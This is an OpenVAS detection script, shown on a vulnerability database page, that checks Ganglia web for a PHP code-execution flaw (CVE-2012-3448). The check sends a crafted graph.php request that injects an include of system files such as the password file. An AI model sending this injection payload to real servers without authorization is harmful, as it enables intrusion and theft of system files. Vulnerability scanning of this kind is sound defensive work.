Lucene search

K
openvasCopyright (C) 2012 Greenbone AGOPENVAS:1361412562310103535
HistoryAug 13, 2012 - 12:00 a.m.

Ganglia PHP Code Execution Vulnerability

2012-08-1300:00:00
Copyright (C) 2012 Greenbone AG
plugins.openvas.org
14

6.5 Medium

AI Score

Confidence

Low

0.215 Low

EPSS

Percentile

96.4%

Ganglia is prone to a vulnerability that lets remote attackers execute
arbitrary code.

# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:ganglia:ganglia-web";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103535");
  script_cve_id("CVE-2012-3448");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_version("2023-07-25T05:05:58+0000");
  script_name("Ganglia PHP Code Execution Vulnerability");
  script_tag(name:"last_modification", value:"2023-07-25 05:05:58 +0000 (Tue, 25 Jul 2023)");
  script_tag(name:"creation_date", value:"2012-08-13 12:40:50 +0200 (Mon, 13 Aug 2012)");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_dependencies("gb_ganglia_detect.nasl", "os_detection.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("ganglia/installed");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/54699");
  script_xref(name:"URL", value:"http://console-cowboys.blogspot.de/2012/07/extending-your-ganglia-install-with.html");

  script_tag(name:"summary", value:"Ganglia is prone to a vulnerability that lets remote attackers execute
  arbitrary code.");

  script_tag(name:"impact", value:"Attackers can exploit this issue to execute arbitrary PHP code within
  the context of the affected web server process.");

  script_tag(name:"solution", value:"Vendor updates are available. Please see the references for more
  information.");

  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("http_func.inc");
include("host_details.inc");
include("os_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

if(!port = get_app_port(cpe:CPE))exit(0);
if(!dir = get_app_location(cpe:CPE, port:port))exit(0);
if(dir == "/") dir = "";

files = traversal_files();

foreach pattern(keys(files)) {

  file = files[pattern];

  url = dir + '/graph.php?g=cpu_report,include+%27/' + file + '%27';

  if(http_vuln_check(port:port, url:url, pattern:pattern)) {
    report = http_report_vuln_url(port:port, url:url);
    security_message(data:report, port:port);
    exit(0);
  }
}

exit(99);

6.5 Medium

AI Score

Confidence

Low

0.215 Low

EPSS

Percentile

96.4%